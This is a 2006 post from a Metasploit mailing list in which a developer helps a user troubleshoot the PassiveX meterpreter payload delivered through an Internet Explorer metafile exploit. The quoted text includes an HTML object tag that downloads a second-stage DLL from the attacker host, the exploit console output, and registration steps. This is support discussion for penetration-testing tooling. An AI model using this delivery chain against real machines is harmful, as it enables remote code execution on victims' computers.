[framework] Using the PassiveX payload
mmiller at hick.org
mmiller at hick.org
Fri May 5 10:00:27 CDT 2006
On Fri, May 05, 2006 at 11:11:43AM +0200, Feature Meister wrote:
> Hi,
>
> it seems as if the control does not get registered. At least there's
> nothing like a "PassiveX.PassiveX" or "CPassiveX" registered under
> HKEY_CLASSES_ROOT.
> The account I am trying it with has administrative privileges.
<snip>
> 3rd response:
> HTTP/1.1 200 OK
> Connection: close
> Content-type: text/html
>
> <html><object classid="CLSID:B3AC7307-FEAE-4e43-B2D6-161E68ABA838"
> codebase="http://192.168.71.75:8000/passivex.dll#-1,-1,-1,-1"><param
> name="HttpHost" value="192.168.71.75"><param name="HttpPort"
> value="8000"><param name="DownloadSecondStage"
> value="1"></object></html>
> ============================================================
> 4th request (C -> 192.168.71.75:8000):
> GET /passivex.dll HTTP/1.1
<snip>
> on MSFConsole I see:
>
> msf ie_xp_pfv_metafile(win32_passivex_meterpreter) > exploit
> [*] Starting PassiveX Handler on 192.168.71.75:8000.
> [*] Waiting for connections to http://192.168.71.75:80/
> [*] HTTP Client connected from 192.168.71.71:1078, redirecting...
> [*] HTTP Client connected from 192.168.71.71:1079, sending 1452 bytes
> of payload...
> [*] Sending PassiveX main page to client...
> [*] Sending PassiveX DLL in HTTP response (106496 bytes)...
This looks like the correct series of events to me. The next thing to
check is whether or not the passivex.dll is in the downloaded program
files folder (%WINDIR%\Downloaded Program Files). You'll need to browse
there from a cmd, not from explorer. If it's there, try to run the
following command:
"regsvr32 passivex.dll"
If the command succeeds, check in the registry again under
HKEY_CLASSES_ROOT for the class name. If it doesn't, note the error and
send it back over to us. As far as I know, PassiveX has no
non-standard DLL dependencies, so it should register without issue. If
the file is not there (be sure to check in CONFLICT.x folders too just
in case), then something is going on that is causing it not to download
properly.
More information about the framework
mailing list